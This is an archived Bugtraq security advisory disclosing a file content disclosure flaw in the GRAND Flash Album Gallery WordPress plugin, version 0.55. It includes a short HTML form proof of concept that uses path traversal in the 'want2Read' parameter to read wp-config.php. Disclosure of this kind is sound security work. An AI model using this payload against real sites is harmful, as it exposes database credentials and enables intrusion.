[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22871: File Content Disclosure in GRAND Flash Album Gallery wordpress plugin

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: HTB22871: File Content Disclosure in GRAND Flash Album Gallery wordpress plugin
From: advisory@xxxxxxxxxxx
Date: Tue, 8 Mar 2011 10:52:57 +0100 (CET)

Vulnerability ID: HTB22871
Reference: 
http://www.htbridge.ch/advisory/file_content_disclosure_in_grand_flash_album_gallery_wordpress_plugin.html
Product: GRAND Flash Album Gallery wordpress plugin
Vendor: Sergey Pasyuk  ( http://codeasily.com/ ) 
Vulnerable Version: 0.55
Vendor Notification: 22 February 2011 
Vulnerability Type: File Content Disclosure
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the 
"/wp-content/plugins/flash-album-gallery/admin/news.php" script to properly 
sanitize user-supplied input in "want2Read" variable.
Successful exploitation of this vulnerability allows remote attacker to obtain 
content of arbitrary file accessible within the context of vulnerable 
application.

The following PoC is available:


<form 
action="http://[host]/wp-content/plugins/flash-album-gallery/admin/news.php"; 
method="post" name="main" >
<input type="hidden" name="want2Read" value="../../../../wp-config.php" />
<input type="submit" value="submit" name="submit" />
</form>

Prev by Date: HTB22873: XSS in Inline Gallery wordpress plugin
Next by Date: HTB22870: SQL Injection in GRAND Flash Album Gallery wordpress plugin
Previous by thread: HTB22873: XSS in Inline Gallery wordpress plugin
Next by thread: HTB22870: SQL Injection in GRAND Flash Album Gallery wordpress plugin
Index(es):
- Date
- Thread